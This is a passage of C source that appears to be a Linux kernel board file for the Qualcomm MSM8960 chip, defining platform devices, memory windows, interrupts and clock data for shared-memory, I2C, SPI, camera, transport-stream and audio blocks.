		.name   = "dsps_a11",
		.start  = INT_DSPS_A11,
		.flags  = IORESOURCE_IRQ,
	},
	{
		.name   = "dsps_a11_smsm",
		.start  = INT_DSPS_A11_SMSM,
		.flags  = IORESOURCE_IRQ,
	},
	{
		.name   = "wcnss_a11",
		.start  = INT_WCNSS_A11,
		.flags  = IORESOURCE_IRQ,
	},
	{
		.name   = "wcnss_a11_smsm",
		.start  = INT_WCNSS_A11_SMSM,
		.flags  = IORESOURCE_IRQ,
	},
};

/* One entry per SMD edge (modem, Q6, DSPS, WCNSS): the inbound IRQ names
 * (resolved against smd_resource) and the outbound doorbell register
 * (out_base + out_offset) with the bit to set for signalling. */
static struct smd_subsystem_config smd_config_list[] = {
	{
		.irq_config_id = SMD_MODEM,
		.subsys_name = "modem",
		.edge = SMD_APPS_MODEM,

		.smd_int.irq_name = "a9_m2a_0",
		.smd_int.flags = IRQF_TRIGGER_RISING,
		.smd_int.irq_id = -1,
		.smd_int.device_name = "smd_dev",
		.smd_int.dev_id = 0,
		.smd_int.out_bit_pos = 1 << 3,
		.smd_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
		.smd_int.out_offset = 0x8,

		.smsm_int.irq_name = "a9_m2a_5",
		.smsm_int.flags = IRQF_TRIGGER_RISING,
		.smsm_int.irq_id = -1,
		.smsm_int.device_name = "smd_smsm",
		.smsm_int.dev_id = 0,
		.smsm_int.out_bit_pos = 1 << 4,
		.smsm_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
		.smsm_int.out_offset = 0x8,
	},
	{
		.irq_config_id = SMD_Q6,
		.subsys_name = "q6",
		.edge = SMD_APPS_QDSP,

		.smd_int.irq_name = "adsp_a11",
		.smd_int.flags = IRQF_TRIGGER_RISING,
		.smd_int.irq_id = -1,
		.smd_int.device_name = "smd_dev",
		.smd_int.dev_id = 0,
		.smd_int.out_bit_pos = 1 << 15,
		.smd_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
		.smd_int.out_offset = 0x8,

		.smsm_int.irq_name = "adsp_a11_smsm",
		.smsm_int.flags = IRQF_TRIGGER_RISING,
		.smsm_int.irq_id = -1,
		.smsm_int.device_name = "smd_smsm",
		.smsm_int.dev_id = 0,
		.smsm_int.out_bit_pos = 1 << 14,
		.smsm_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
		.smsm_int.out_offset = 0x8,
	},
	{
		.irq_config_id = SMD_DSPS,
		.subsys_name = "dsps",
		.edge = SMD_APPS_DSPS,

		/* DSPS signals through the SIC, not the APCS GCC. */
		.smd_int.irq_name = "dsps_a11",
		.smd_int.flags = IRQF_TRIGGER_RISING,
		.smd_int.irq_id = -1,
		.smd_int.device_name = "smd_dev",
		.smd_int.dev_id = 0,
		.smd_int.out_bit_pos = 1,
		.smd_int.out_base = (void __iomem *)MSM_SIC_NON_SECURE_BASE,
		.smd_int.out_offset = 0x4080,

		.smsm_int.irq_name = "dsps_a11_smsm",
		.smsm_int.flags = IRQF_TRIGGER_RISING,
		.smsm_int.irq_id = -1,
		.smsm_int.device_name = "smd_smsm",
		.smsm_int.dev_id = 0,
		.smsm_int.out_bit_pos = 1,
		.smsm_int.out_base = (void __iomem *)MSM_SIC_NON_SECURE_BASE,
		.smsm_int.out_offset = 0x4094,
	},
	{
		.irq_config_id = SMD_WCNSS,
		.subsys_name = "wcnss",
		.edge = SMD_APPS_WCNSS,

		.smd_int.irq_name = "wcnss_a11",
		.smd_int.flags = IRQF_TRIGGER_RISING,
		.smd_int.irq_id = -1,
		.smd_int.device_name = "smd_dev",
		.smd_int.dev_id = 0,
		.smd_int.out_bit_pos = 1 << 25,
		.smd_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
		.smd_int.out_offset = 0x8,

		.smsm_int.irq_name = "wcnss_a11_smsm",
		.smsm_int.flags = IRQF_TRIGGER_RISING,
		.smsm_int.irq_id = -1,
		.smsm_int.device_name = "smd_smsm",
		.smsm_int.dev_id = 0,
		.smsm_int.out_bit_pos = 1 << 23,
		.smsm_int.out_base = (void __iomem *)MSM_APCS_GCC_BASE,
		.smsm_int.out_offset = 0x8,
	},
};

/* Subsystem-restart tuning: skip the SMSM reset handshake on restart. */
static struct smd_subsystem_restart_config smd_ssr_config = {
	.disable_smsm_reset_handshake = 1,
};

static struct smd_platform smd_platform_data = {
	.num_ss_configs = ARRAY_SIZE(smd_config_list),
	.smd_ss_configs = smd_config_list,
	.smd_ssr_config = &smd_ssr_config,
};

/* Shared-memory driver device tying the resources and configs together. */
struct platform_device msm_device_smd = {
	.name	= "msm_smd",
	.id	= -1,
	.resource = smd_resource,
	.num_resources = ARRAY_SIZE(smd_resource),
	.dev = {
		.platform_data = &smd_platform_data,
	},
};

/* BAM data-mux transport device (no resources; probed by name). */
struct platform_device msm_device_bam_dmux = {
	.name		= "BAM_RMNT",
	.id		= -1,
};
/* Per-CPU sleep-status readback: register at ACC0+0x08, stride between
 * CPUs derived from the ACC1/ACC0 spacing, status in bit 13. */
static struct msm_pm_sleep_status_data msm_pm_slp_sts_data = {
	.base_addr = MSM_ACC0_BASE + 0x08,
	.cpu_offset = MSM_ACC1_BASE - MSM_ACC0_BASE,
	.mask = 1UL << 13,
};

struct platform_device msm8960_cpu_slp_status = {
	.name		= "cpu_slp_status",
	.id		= -1,
	.dev = {
		.platform_data = &msm_pm_slp_sts_data,
	},
};
/* Hardware watchdog: pet every 10 s, bark (warning IRQ) at 11 s;
 * registers are secure-world managed (has_secure). */
static struct msm_watchdog_pdata msm_watchdog_pdata = {
	.pet_time = 10000,
	.bark_time = 11000,
	.has_secure = true,
	.base = MSM_TMR0_BASE + WDT0_OFFSET,
};

static struct resource msm_watchdog_resources[] = {
	{
		.start	= WDT0_ACCSCSSNBARK_INT,
		.end	= WDT0_ACCSCSSNBARK_INT,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_watchdog = {
	.name = "msm_watchdog",
	.id = -1,
	.dev = {
		.platform_data = &msm_watchdog_pdata,
	},
	.num_resources = ARRAY_SIZE(msm_watchdog_resources),
	.resource = msm_watchdog_resources,
};
/* ADM data-mover: IRQ plus a 1 MiB register window; sd/sd_size select
 * the security-domain register bank used by this processor. */
static struct resource msm_dmov_resource[] = {
	{
		.start = ADM_0_SCSS_1_IRQ,
		.flags = IORESOURCE_IRQ,
	},
	{
		.start = 0x18320000,
		.end = 0x18320000 + SZ_1M - 1,
		.flags = IORESOURCE_MEM,
	},
};

static struct msm_dmov_pdata msm_dmov_pdata = {
	.sd = 1,
	.sd_size = 0x800,
};

struct platform_device msm8960_device_dmov = {
	.name	= "msm_dmov",
	.id	= -1,
	.resource = msm_dmov_resource,
	.num_resources = ARRAY_SIZE(msm_dmov_resource),
	.dev = {
		.platform_data = &msm_dmov_pdata,
	},
};
/* SDCC device lookup table for msm_add_sdcc(); index = controller - 1. */
static struct platform_device *msm_sdcc_devices[] __initdata = {
	&msm_device_sdc1,
	&msm_device_sdc2,
	&msm_device_sdc3,
	&msm_device_sdc4,
	&msm_device_sdc5,
};
/*
 * msm_add_sdcc() - attach board platform data to an SDCC controller and
 * register the device.
 * @controller: 1-based SDCC controller number
 * @plat: board-specific MMC platform data (caller retains ownership)
 *
 * Returns 0 on success, -EINVAL for an out-of-range controller number,
 * or the error from platform_device_register().
 */
int __init msm_add_sdcc(unsigned int controller, struct mmc_platform_data *plat)
{
	struct platform_device *pdev;

	/* Bound by the table size rather than a magic "5" so the check
	 * tracks msm_sdcc_devices if controllers are added or removed. */
	if (controller < 1 || controller > ARRAY_SIZE(msm_sdcc_devices))
		return -EINVAL;

	pdev = msm_sdcc_devices[controller - 1];
	pdev->dev.platform_data = plat;
	return platform_device_register(pdev);
}
/* QUP I2C controllers on GSBI4/3/9/10/12.  Each has a 4-byte GSBI
 * control register, the QUP register window, and the QUP error IRQ. */
static struct resource resources_qup_i2c_gsbi4[] = {
	{
		.name	= "gsbi_qup_i2c_addr",
		.start	= MSM_GSBI4_PHYS,
		.end	= MSM_GSBI4_PHYS + 4 - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_phys_addr",
		.start	= MSM_GSBI4_QUP_PHYS,
		.end	= MSM_GSBI4_QUP_PHYS + MSM_QUP_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_err_intr",
		.start	= GSBI4_QUP_IRQ,
		.end	= GSBI4_QUP_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_qup_i2c_gsbi4 = {
	.name		= "qup_i2c",
	.id		= 4,
	.num_resources	= ARRAY_SIZE(resources_qup_i2c_gsbi4),
	.resource	= resources_qup_i2c_gsbi4,
};

static struct resource resources_qup_i2c_gsbi3[] = {
	{
		.name	= "gsbi_qup_i2c_addr",
		.start	= MSM_GSBI3_PHYS,
		.end	= MSM_GSBI3_PHYS + 4 - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_phys_addr",
		.start	= MSM_GSBI3_QUP_PHYS,
		.end	= MSM_GSBI3_QUP_PHYS + MSM_QUP_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_err_intr",
		.start	= GSBI3_QUP_IRQ,
		.end	= GSBI3_QUP_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_qup_i2c_gsbi3 = {
	.name		= "qup_i2c",
	.id		= 3,
	.num_resources	= ARRAY_SIZE(resources_qup_i2c_gsbi3),
	.resource	= resources_qup_i2c_gsbi3,
};

static struct resource resources_qup_i2c_gsbi9[] = {
	{
		.name	= "gsbi_qup_i2c_addr",
		.start	= MSM_GSBI9_PHYS,
		.end	= MSM_GSBI9_PHYS + 4 - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_phys_addr",
		.start	= MSM_GSBI9_QUP_PHYS,
		.end	= MSM_GSBI9_QUP_PHYS + MSM_QUP_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_err_intr",
		.start	= GSBI9_QUP_IRQ,
		.end	= GSBI9_QUP_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_qup_i2c_gsbi9 = {
	.name		= "qup_i2c",
	/* NOTE(review): id 0 rather than 9 — appears deliberate (I2C bus
	 * numbering, not GSBI numbering) but verify no clash with other
	 * qup_i2c ids on boards that register this device. */
	.id		= 0,
	.num_resources	= ARRAY_SIZE(resources_qup_i2c_gsbi9),
	.resource	= resources_qup_i2c_gsbi9,
};

static struct resource resources_qup_i2c_gsbi10[] = {
	{
		.name	= "gsbi_qup_i2c_addr",
		.start	= MSM_GSBI10_PHYS,
		.end	= MSM_GSBI10_PHYS + 4 - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_phys_addr",
		.start	= MSM_GSBI10_QUP_PHYS,
		.end	= MSM_GSBI10_QUP_PHYS + MSM_QUP_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_err_intr",
		.start	= GSBI10_QUP_IRQ,
		.end	= GSBI10_QUP_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_qup_i2c_gsbi10 = {
	.name		= "qup_i2c",
	.id		= 10,
	.num_resources	= ARRAY_SIZE(resources_qup_i2c_gsbi10),
	.resource	= resources_qup_i2c_gsbi10,
};

static struct resource resources_qup_i2c_gsbi12[] = {
	{
		.name	= "gsbi_qup_i2c_addr",
		.start	= MSM_GSBI12_PHYS,
		.end	= MSM_GSBI12_PHYS + 4 - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_phys_addr",
		.start	= MSM_GSBI12_QUP_PHYS,
		.end	= MSM_GSBI12_QUP_PHYS + MSM_QUP_SIZE - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "qup_err_intr",
		.start	= GSBI12_QUP_IRQ,
		.end	= GSBI12_QUP_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_qup_i2c_gsbi12 = {
	.name		= "qup_i2c",
	.id		= 12,
	.num_resources	= ARRAY_SIZE(resources_qup_i2c_gsbi12),
	.resource	= resources_qup_i2c_gsbi12,
};
#ifdef CONFIG_MSM_CAMERA
/* Camera I2C mux on GSBI4: read/write window plus control register. */
static struct resource msm_cam_gsbi4_i2c_mux_resources[] = {
	{
		.name   = "i2c_mux_rw",
		.start  = 0x008003E0,
		.end    = 0x008003E0 + SZ_8 - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "i2c_mux_ctl",
		.start  = 0x008020B8,
		.end    = 0x008020B8 + SZ_4 - 1,
		.flags  = IORESOURCE_MEM,
	},
};

struct platform_device msm8960_device_i2c_mux_gsbi4 = {
	.name           = "msm_cam_i2c_mux",
	.id             = 0,
	.resource       = msm_cam_gsbi4_i2c_mux_resources,
	.num_resources  = ARRAY_SIZE(msm_cam_gsbi4_i2c_mux_resources),
};

/* Three CSI PHYs: one 4-lane (phy0) and two 2-lane (phy1/phy2), each a
 * 1 KiB register window plus its interrupt. */
static struct resource msm_csiphy0_resources[] = {
	{
		.name   = "csiphy",
		.start  = 0x04800C00,
		.end    = 0x04800C00 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "csiphy",
		.start  = CSIPHY_4LN_IRQ,
		.end    = CSIPHY_4LN_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

static struct resource msm_csiphy1_resources[] = {
	{
		.name   = "csiphy",
		.start  = 0x04801000,
		.end    = 0x04801000 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "csiphy",
		.start  = MSM8960_CSIPHY_2LN_IRQ,
		.end    = MSM8960_CSIPHY_2LN_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

static struct resource msm_csiphy2_resources[] = {
	{
		.name   = "csiphy",
		.start  = 0x04801400,
		.end    = 0x04801400 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "csiphy",
		.start  = MSM8960_CSIPHY_2_2LN_IRQ,
		.end    = MSM8960_CSIPHY_2_2LN_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_csiphy0 = {
	.name           = "msm_csiphy",
	.id             = 0,
	.resource       = msm_csiphy0_resources,
	.num_resources  = ARRAY_SIZE(msm_csiphy0_resources),
};

struct platform_device msm8960_device_csiphy1 = {
	.name           = "msm_csiphy",
	.id             = 1,
	.resource       = msm_csiphy1_resources,
	.num_resources  = ARRAY_SIZE(msm_csiphy1_resources),
};

struct platform_device msm8960_device_csiphy2 = {
	.name           = "msm_csiphy",
	.id             = 2,
	.resource       = msm_csiphy2_resources,
	.num_resources  = ARRAY_SIZE(msm_csiphy2_resources),
};

/* Three CSID (CSI decoder) blocks, 1 KiB each. */
static struct resource msm_csid0_resources[] = {
	{
		.name   = "csid",
		.start  = 0x04800000,
		.end    = 0x04800000 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "csid",
		.start  = CSI_0_IRQ,
		.end    = CSI_0_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

static struct resource msm_csid1_resources[] = {
	{
		.name   = "csid",
		.start  = 0x04800400,
		.end    = 0x04800400 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "csid",
		.start  = CSI_1_IRQ,
		.end    = CSI_1_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

static struct resource msm_csid2_resources[] = {
	{
		.name   = "csid",
		.start  = 0x04801800,
		.end    = 0x04801800 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "csid",
		.start  = CSI_2_IRQ,
		.end    = CSI_2_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_csid0 = {
	.name           = "msm_csid",
	.id             = 0,
	.resource       = msm_csid0_resources,
	.num_resources  = ARRAY_SIZE(msm_csid0_resources),
};

struct platform_device msm8960_device_csid1 = {
	.name           = "msm_csid",
	.id             = 1,
	.resource       = msm_csid1_resources,
	.num_resources  = ARRAY_SIZE(msm_csid1_resources),
};

struct platform_device msm8960_device_csid2 = {
	.name           = "msm_csid",
	.id             = 2,
	.resource       = msm_csid2_resources,
	.num_resources  = ARRAY_SIZE(msm_csid2_resources),
};

/* ISP interface (ISPIF) block. */
struct resource msm_ispif_resources[] = {
	{
		.name   = "ispif",
		.start  = 0x04800800,
		.end    = 0x04800800 + SZ_1K - 1,
		.flags  = IORESOURCE_MEM,
	},
	{
		.name   = "ispif",
		.start  = ISPIF_IRQ,
		.end    = ISPIF_IRQ,
		.flags  = IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_ispif = {
	.name           = "msm_ispif",
	.id             = 0,
	.resource       = msm_ispif_resources,
	.num_resources  = ARRAY_SIZE(msm_ispif_resources),
};

/* VFE (video front end), 1 MiB window. */
static struct resource msm_vfe_resources[] = {
	{
		.name	= "vfe32",
		.start	= 0x04500000,
		.end	= 0x04500000 + SZ_1M - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "vfe32",
		.start	= VFE_IRQ,
		.end	= VFE_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_vfe = {
	.name           = "msm_vfe",
	.id             = 0,
	.resource       = msm_vfe_resources,
	.num_resources  = ARRAY_SIZE(msm_vfe_resources),
};

/* VPE (video post-processing engine), 1 MiB window. */
static struct resource msm_vpe_resources[] = {
	{
		.name	= "vpe",
		.start	= 0x05300000,
		.end	= 0x05300000 + SZ_1M - 1,
		.flags	= IORESOURCE_MEM,
	},
	{
		.name	= "vpe",
		.start	= VPE_IRQ,
		.end	= VPE_IRQ,
		.flags	= IORESOURCE_IRQ,
	},
};

struct platform_device msm8960_device_vpe = {
	.name           = "msm_vpe",
	.id             = 0,
	.resource       = msm_vpe_resources,
	.num_resources  = ARRAY_SIZE(msm_vpe_resources),
};
#endif
/* TSIF (transport-stream interface) register windows and the GPIO mux
 * settings (alt-function 1, pull-down, 2 mA) for both TSIF ports. */
#define MSM_TSIF0_PHYS       (0x18200000)
#define MSM_TSIF1_PHYS       (0x18201000)
#define MSM_TSIF_SIZE        (0x200)

#define TSIF_0_CLK       GPIO_CFG(75, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_0_EN        GPIO_CFG(76, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_0_DATA      GPIO_CFG(77, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_0_SYNC      GPIO_CFG(82, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_CLK       GPIO_CFG(79, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_EN        GPIO_CFG(80, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_DATA      GPIO_CFG(81, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
#define TSIF_1_SYNC      GPIO_CFG(78, 1, GPIO_CFG_INPUT, \
	GPIO_CFG_PULL_DOWN, GPIO_CFG_2MA)
static const struct msm_gpio tsif0_gpios[] = {
{ .gpio_cfg = TSIF_0_CLK, .label = "tsif_clk", },
{ .gpio_cfg = TSIF_0_EN, .label = "tsif_en", },
{ .gpio_cfg = TSIF_0_DATA, .label = "tsif_data", },
{ .gpio_cfg = TSIF_0_SYNC, .label = "tsif_sync", },
};
static const struct msm_gpio tsif1_gpios[] = {
{ .gpio_cfg = TSIF_1_CLK, .label = "tsif_clk", },
{ .gpio_cfg = TSIF_1_EN, .label = "tsif_en", },
{ .gpio_cfg = TSIF_1_DATA, .label = "tsif_data", },
{ .gpio_cfg = TSIF_1_SYNC, .label = "tsif_sync", },
};
/* TSIF1 platform data: GPIO table plus interface/reference clock names. */
struct msm_tsif_platform_data tsif1_platform_data = {
.num_gpios = ARRAY_SIZE(tsif1_gpios),
.gpios = tsif1_gpios,
.tsif_pclk = "iface_clk",
.tsif_ref_clk = "ref_clk",
};
/* TSIF1 resources: IRQ, register window, and data-mover channel/CRCI
 * (the DMA channel pair is shared with TSIF0 below). */
struct resource tsif1_resources[] = {
[0] = {
.flags = IORESOURCE_IRQ,
.start = TSIF2_IRQ,
.end = TSIF2_IRQ,
},
[1] = {
.flags = IORESOURCE_MEM,
.start = MSM_TSIF1_PHYS,
.end = MSM_TSIF1_PHYS + MSM_TSIF_SIZE - 1,
},
[2] = {
.flags = IORESOURCE_DMA,
.start = DMOV_TSIF_CHAN,
.end = DMOV_TSIF_CRCI,
},
};
struct msm_tsif_platform_data tsif0_platform_data = {
.num_gpios = ARRAY_SIZE(tsif0_gpios),
.gpios = tsif0_gpios,
.tsif_pclk = "iface_clk",
.tsif_ref_clk = "ref_clk",
};
struct resource tsif0_resources[] = {
[0] = {
.flags = IORESOURCE_IRQ,
.start = TSIF1_IRQ,
.end = TSIF1_IRQ,
},
[1] = {
.flags = IORESOURCE_MEM,
.start = MSM_TSIF0_PHYS,
.end = MSM_TSIF0_PHYS + MSM_TSIF_SIZE - 1,
},
[2] = {
.flags = IORESOURCE_DMA,
.start = DMOV_TSIF_CHAN,
.end = DMOV_TSIF_CRCI,
},
};
/* The two TSIF instances as a single device array, ids 0 and 1. */
struct platform_device msm_device_tsif[2] = {
{
.name = "msm_tsif",
.id = 0,
.num_resources = ARRAY_SIZE(tsif0_resources),
.resource = tsif0_resources,
.dev = {
.platform_data = &tsif0_platform_data
},
},
{
.name = "msm_tsif",
.id = 1,
.num_resources = ARRAY_SIZE(tsif1_resources),
.resource = tsif1_resources,
.dev = {
.platform_data = &tsif1_platform_data
},
}
};
/* SSBI bus to the primary PMIC: single register window for the command
 * interface. */
static struct resource resources_ssbi_pmic[] = {
{
.start = MSM_PMIC1_SSBI_CMD_PHYS,
.end = MSM_PMIC1_SSBI_CMD_PHYS + MSM_PMIC_SSBI_SIZE - 1,
.flags = IORESOURCE_MEM,
},
};
struct platform_device msm8960_device_ssbi_pmic = {
.name = "msm_ssbi",
.id = 0,
.resource = resources_ssbi_pmic,
.num_resources = ARRAY_SIZE(resources_ssbi_pmic),
};
/*
 * QUP SPI controller on GSBI1: register windows, IRQ, and the GPIO
 * numbers used for the SPI signals (IORESOURCE_IO entries; start == end
 * == GPIO number).
 */
static struct resource resources_qup_spi_gsbi1[] = {
{
.name = "spi_base",
.start = MSM_GSBI1_QUP_PHYS,
.end = MSM_GSBI1_QUP_PHYS + SZ_4K - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "gsbi_base",
.start = MSM_GSBI1_PHYS,
.end = MSM_GSBI1_PHYS + 4 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "spi_irq_in",
.start = MSM8960_GSBI1_QUP_IRQ,
.end = MSM8960_GSBI1_QUP_IRQ,
.flags = IORESOURCE_IRQ,
},
{
.name = "spi_clk",
.start = 9,
.end = 9,
.flags = IORESOURCE_IO,
},
{
.name = "spi_miso",
.start = 7,
.end = 7,
.flags = IORESOURCE_IO,
},
{
.name = "spi_mosi",
.start = 6,
.end = 6,
.flags = IORESOURCE_IO,
},
{
.name = "spi_cs",
.start = 8,
.end = 8,
.flags = IORESOURCE_IO,
},
{
.name = "spi_cs1",
.start = 14,
.end = 14,
.flags = IORESOURCE_IO,
},
};
struct platform_device msm8960_device_qup_spi_gsbi1 = {
.name = "spi_qsd",
.id = 0,
.num_resources = ARRAY_SIZE(resources_qup_spi_gsbi1),
.resource = resources_qup_spi_gsbi1,
};
/*
 * Audio platform devices.  Most are bare name/id pairs that bind to the
 * corresponding QDSP6 (q6) audio drivers; for "msm-dai-q6" devices the
 * id encodes the AFE port the DAI driver should use.
 */
struct platform_device msm_pcm = {
.name = "msm-pcm-dsp",
.id = -1,
};
struct platform_device msm_multi_ch_pcm = {
.name = "msm-multi-ch-pcm-dsp",
.id = -1,
};
struct platform_device msm_lowlatency_pcm = {
.name = "msm-lowlatency-pcm-dsp",
.id = -1,
};
struct platform_device msm_pcm_routing = {
.name = "msm-pcm-routing",
.id = -1,
};
struct platform_device msm_cpudai0 = {
.name = "msm-dai-q6",
.id = 0x4000,
};
struct platform_device msm_cpudai1 = {
.name = "msm-dai-q6",
.id = 0x4001,
};
struct platform_device msm8960_cpudai_slimbus_2_rx = {
.name = "msm-dai-q6",
.id = 0x4004,
};
struct platform_device msm8960_cpudai_slimbus_2_tx = {
.name = "msm-dai-q6",
.id = 0x4005,
};
struct platform_device msm_cpudai_hdmi_rx = {
.name = "msm-dai-q6-hdmi",
.id = 8,
};
struct platform_device msm_cpudai_bt_rx = {
.name = "msm-dai-q6",
.id = 0x3000,
};
struct platform_device msm_cpudai_bt_tx = {
.name = "msm-dai-q6",
.id = 0x3001,
};
struct platform_device msm_cpudai_fm_rx = {
.name = "msm-dai-q6",
.id = 0x3004,
};
struct platform_device msm_cpudai_fm_tx = {
.name = "msm-dai-q6",
.id = 0x3005,
};
struct platform_device msm_cpudai_incall_music_rx = {
.name = "msm-dai-q6",
.id = 0x8005,
};
struct platform_device msm_cpudai_incall_record_rx = {
.name = "msm-dai-q6",
.id = 0x8004,
};
struct platform_device msm_cpudai_incall_record_tx = {
.name = "msm-dai-q6",
.id = 0x8003,
};
/*
 * Machine specific data for AUX PCM Interface
 * which the driver will be unaware of.
 */
struct msm_dai_auxpcm_pdata auxpcm_pdata = {
.clk = "pcm_clk",
/* 8 kHz mode: internal sync, 32 bits per frame, linear quantization,
 * 256 kHz PCM clock. */
.mode_8k = {
.mode = AFE_PCM_CFG_MODE_PCM,
.sync = AFE_PCM_CFG_SYNC_INT,
.frame = AFE_PCM_CFG_FRM_32BPF,
.quant = AFE_PCM_CFG_QUANT_LINEAR_NOPAD,
.slot = 0,
.data = AFE_PCM_CFG_CDATAOE_MASTER,
.pcm_clk_rate = 256000,
},
/* 16 kHz mode: same configuration at a 512 kHz PCM clock. */
.mode_16k = {
.mode = AFE_PCM_CFG_MODE_PCM,
.sync = AFE_PCM_CFG_SYNC_INT,
.frame = AFE_PCM_CFG_FRM_32BPF,
.quant = AFE_PCM_CFG_QUANT_LINEAR_NOPAD,
.slot = 0,
.data = AFE_PCM_CFG_CDATAOE_MASTER,
.pcm_clk_rate = 512000,
}
};
struct platform_device msm_cpudai_auxpcm_rx = {
.name = "msm-dai-q6",
.id = 2,
.dev = {
.platform_data = &auxpcm_pdata,
},
};
struct platform_device msm_cpudai_auxpcm_tx = {
.name = "msm-dai-q6",
.id = 3,
.dev = {
.platform_data = &auxpcm_pdata,
},
};
struct platform_device msm_cpu_fe = {
.name = "msm-dai-fe",
.id = -1,
};
struct platform_device msm_stub_codec = {
.name = "msm-stub-codec",
.id = 1,
};
struct platform_device msm_voice = {
.name = "msm-pcm-voice",
.id = -1,
};
struct platform_device msm_voip = {
.name = "msm-voip-dsp",
.id = -1,
};
struct platform_device msm_lpa_pcm = {
.name = "msm-pcm-lpa",
.id = -1,
};
struct platform_device msm_compr_dsp = {
.name = "msm-compr-dsp",
.id = -1,
};
struct platform_device msm_pcm_hostless = {
.name = "msm-pcm-hostless",
.id = -1,
};
struct platform_device msm_cpudai_afe_01_rx = {
.name = "msm-dai-q6",
.id = 0xE0,
};
struct platform_device msm_cpudai_afe_01_tx = {
.name = "msm-dai-q6",
.id = 0xF0,
};
struct platform_device msm_cpudai_afe_02_rx = {
.name = "msm-dai-q6",
.id = 0xF1,
};
struct platform_device msm_cpudai_afe_02_tx = {
.name = "msm-dai-q6",
.id = 0xE1,
};
struct platform_device msm_pcm_afe = {
.name = "msm-pcm-afe",
.id = -1,
};
/*
 * Footswitch (power-rail switch) driver data for each multimedia core:
 * the clocks the footswitch driver must handle around power transitions
 * (clock lists are NULL-terminated via the trailing { 0 } entry) and the
 * bus master port(s) associated with the core.
 */
static struct fs_driver_data gfx2d0_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
};
static struct fs_driver_data gfx2d1_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
};
static struct fs_driver_data gfx3d_fs_data = {
.clks = (struct fs_clk_data[]){
/* 3D core clock is dropped to 27 MHz across resets. */
{ .name = "core_clk", .reset_rate = 27000000 },
{ .name = "iface_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_3D,
};
/* 8960AB variant adds a bus clock and a second 3D bus master port. */
static struct fs_driver_data gfx3d_fs_data_8960ab = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk", .reset_rate = 27000000 },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_GRAPHICS_3D,
.bus_port1 = MSM_BUS_MASTER_GRAPHICS_3D_PORT1,
};
static struct fs_driver_data ijpeg_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_JPEG_ENC,
};
static struct fs_driver_data mdp_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
